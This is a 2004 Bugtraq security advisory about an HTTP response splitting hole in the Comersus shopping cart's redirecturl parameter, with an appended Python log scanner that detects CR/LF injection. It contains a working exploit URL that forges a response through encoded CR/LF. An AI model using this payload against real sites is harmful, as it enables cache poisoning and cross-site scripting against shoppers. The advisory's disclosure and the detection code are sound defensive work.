[36353] in bugtraq
ADVISORY: http response splitting hole in Comersus shopping cart
daemon@ATHENA.MIT.EDU (Maestro De-Seguridad)
Thu Sep 2 00:42:32 2004
From: "Maestro De-Seguridad" <maestrodeseguridad@lycos.com>
To: bugtraq@securityfocus.com
Date: Tue, 31 Aug 2004 23:52:54 -0500
Message-Id: <20040901045254.199A9E5BC6@ws7-2.us4.outblaze.com>
ADVISORY
Author: Maestro (me!)
Date: 01-SEP-04
Vendor: Comersus (www.comersus.com)
Product: Comersus Shopping Cart 5.0991
Problem: HTTP response splitting (web cache poisoning, XSS, yadayadayada) -
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Exploit:
http://site/path_to_comersus/comersus_customerLoggedVerify.asp?redirecturl=%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2028%0d%0a%0d%0a{html}0wned%20by%20me{/html}
(replace curly braces with lessthan and greaterthan)
Vendor status: vendor was contacted (attempt) several times over the
last two weeks, by their bug report form, and by email to support. No
response so far.
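Added example, not part of the original advisory and not vendor code: a log check that flags requests whose query parameters decode to CR or LF, the pattern the redirecturl parameter above is abused with, including double-encoded forms. The log format (Common Log Format), the addresses, the /store/ path and welcome.asp are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines; only the script and parameter names come from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2004:10:00:01 +0000] "GET /store/comersus_customerLoggedVerify.asp?redirecturl=welcome.asp HTTP/1.0" 302 0',
    '192.0.2.11 - - [01/Sep/2004:10:00:05 +0000] "GET /store/comersus_customerLoggedVerify.asp?redirecturl=%0d%0aX-Injected:%201 HTTP/1.0" 302 0',
    '192.0.2.12 - - [01/Sep/2004:10:00:09 +0000] "GET /store/comersus_customerLoggedVerify.asp?redirecturl=a%250D%250Ab HTTP/1.0" 302 0',
    '192.0.2.13 - - [01/Sep/2004:10:00:12 +0000] "GET /store/index.asp?q=line%20one HTTP/1.0" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded CR/LF (%250d%250a) is exposed too."""
    for _ in range(max_rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value

def crlf_params(request_uri):
    """Return the names of query parameters whose decoded value contains CR or LF."""
    query = request_uri.partition("?")[2]
    hits = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if re.search(r"[\r\n]", fully_decode(raw)):
            hits.append(name)
    return hits

def scan(lines):
    """Return (client_ip, parameter_names) for each log line carrying CR/LF in a parameter."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        names = crlf_params(match.group(1))
        if names:
            findings.append((line.split()[0], names))
    return findings

if __name__ == "__main__":
    for client, names in scan(SAMPLE_LOG):
        print(f"CR/LF in parameter(s) {names} from {client}")
```

The same decode-then-reject test belongs in the redirect handler itself: a value that contains CR or LF after decoding should never reach a Location header.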